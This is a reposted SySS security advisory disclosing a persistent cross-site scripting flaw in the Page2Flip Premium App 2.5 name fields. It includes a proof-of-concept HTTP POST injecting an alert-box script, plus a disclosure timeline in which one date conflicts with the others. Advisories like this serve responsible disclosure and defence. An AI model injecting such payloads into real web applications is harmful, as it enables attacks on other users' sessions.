Home / exploitsPDF  

Page2Flip 2.5 Cross Site Scripting

Posted on 25 August 2015

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-028 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Version(s): Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Version(s): Premium App 2.5 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: High Solution Status: Open Vendor Notification: 2015-06-29 Solution Date: Public Disclosure: CVE Reference: Not yet assigned Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: With the Page2Flip Web application, it is possible to create e-papers in PDF format that can be flicked through digitally. Such e-papers can be used for magazines, catalogues, flyers, etc. (see [1]). The Page2Flip application is vulnerable to Persistent Cross-Site Scripting so that administrative users can attack other administrative users or users with fewer privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH identified a persistent cross-site scripting vulnerability in the Page2Flip Premium App. At least the parameters "first name" and "last name" are not sanitized sufficiently resulting in a persistent cross-site scripting vulnerability. This reflected cross-site scripting vulnerability can be exploited in the context of an authenticated user by storing script code in one of these fields. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP POST request using the JavaScript code "<script>alert(1)</script>" as the value for the parameter "nachname" demonstrates the persistent cross-site scripting vulnerability by showing a JavaScript alert box as soon as this user has logged on: POST /settings/users HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 1239 Cookie: <cookies> accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.ev ent.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-06-23: Vulnerability discovered 2013-06-29: Vulnerability reported to vendor 2015-07-07: Reported vulnerabilities again as the vendor did not respond to the first e-mail 2015-07-14: Reminder sent concerning reported vulnerabilities 2015-08-24: Public release of security advisory according to the SySS Responsible Disclosure Policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Page2Flip homepage http://page2flip.de/ [2] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Erlijn van Genuchten of the SySS GmbH. E-Mail: erlijn.vangenuchten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc Key ID: 0xBD96FF2A Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJV2x3sAAoJEAylhje9lv8qTP8QAK2z/18lni4UnWo3RElmM+/c CiaqysnydDIvREm2Px36HQjeUDrYA35pZZhxi742E/flMhGw2/aH1gdVtmB6K7ai qnIvStXOIMVul7IGhuHsOn+W7k7IfRx4726VGVoWNyUFoLmn5azU6/OqY+2ql6fH rh/RfdKt8Lp2Q0KSdZy7Le3Il7hJX7YRoD8O/uECI7U2MtVwWJQg/zfK1y9+zFpP Z7v55GMWRDZ4UWin6Fgps3ayVqdnmwUOo0R8xIkn9HU5j7S89QT+nRBE46FLO4ED ZidsWxTeoUS75COcWsuCWVJXsse4KpdDSBVfIPoRG9OUU5s081OuDXHApZGYVlZb lHlmVwjtyIGXUe5vecdCzjY4rk+C3nWwnr9Tew4QNtzg3NdPfugrpNeyBGFeVcu6 749ojAkzcGbFToEvbYBehBsbnNFq1DbUuLTkib+TCmM36/UZiZRZ9rnVS1T4e7Z3 r6fSlYVmFT19j4KfyucDvLv1XVsj4AJ77YI51xlRvnDEJkmQd3pvGfixZJ3n0Gse eY9l7398jSzMMv+ePZ2eDWFomt23+tNODROy/ST9n15avYi2WlNb3aai86CdGnqZ bstvEc7NTVyMotWmfYmbWidqMiCI4toB9ZAUMVlEUKTKMLQp6vUZe8lUiOpjNczE 0vOmqRgHRAff0wPtjo1I =rzEs -----END PGP SIGNATURE-----

 

TOP